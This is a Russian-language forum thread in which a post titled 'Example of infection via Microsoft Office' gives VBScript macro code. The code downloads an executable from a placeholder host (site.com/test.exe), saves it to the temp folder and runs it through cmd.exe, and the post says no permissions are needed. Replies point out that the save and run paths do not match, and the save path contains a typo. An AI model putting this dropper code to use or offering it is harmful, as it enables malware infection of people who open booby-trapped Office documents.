Форум OlegON > Компьютеры и Программное обеспечение > Операционные системы и программное обеспечение > Программирование

Пример скачивания и запуска файла через Microsoft office (VBS) : Программирование

08.02.2023 14:10


Контакты Поиск
22.12.2022 11:26
Occul
 
Пример заражения через Microsoft office

Все вы наверное слышали, что можно скачать файл и запустить его через документ Office или Excel. Сейчас мы вам расскажем про эту технологию.

Тут на самом деле ни чего сложного нет, и весь секрет хранится в макросах. Все документы офиса поддерживают макросы. Макрос это скрипты написанные на visual basic scripts (vbs). Пример простого запуска макроса можно найти тут https://olegon.ru/showthread.php?t=37679.

⚡ Код скачивания файла
Код:
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP") 
oXMLHTTP.Open "GET", "http://site.com/test.exe", 0
oXMLHTTP.Send 
Set oADOStream = CreateObject("ADODB.Stream") 
oADOStream.Mode = 3 
oADOStream.Type = 1 
oADOStream.Open 
oADOStream.Write oXMLHTTP.responseBody 
oADOStream.SaveToFile "c:\windiws\temp\test.exe", 2
⚡ Код запуска exe.
Код:
Set shell = WScript.CreateObject("WScript.Shell")
Set resp = shell.exec("cmd.exe /c C:\windows\temp\test.exe")
word = resp.StdOut.ReadAll() 
segm = Split(word, vbcrlf)
word = "cmd /c " & chr(34) & segm (0) & chr(34) 
shell.exec( word )
Сохраняем и запускаем файл из темпа. Там не требуется получать каких либо разрешений.
22.12.2022 12:36
Dim
 
не взлетит - сохраняем в один каталог, а запускать пытаемся с другого




(0Мб)




(0Мб)
22.12.2022 12:40
OlegON
 
так это не один код, а два разных ;) на самом деле главное-то суть... интересно...
Часовой пояс GMT +3, время: 14:10.

Форум на базе vBulletin®
Copyright © Jelsoft Enterprises Ltd.
В случае заимствования информации гипертекстовая индексируемая ссылка на Форум обязательна.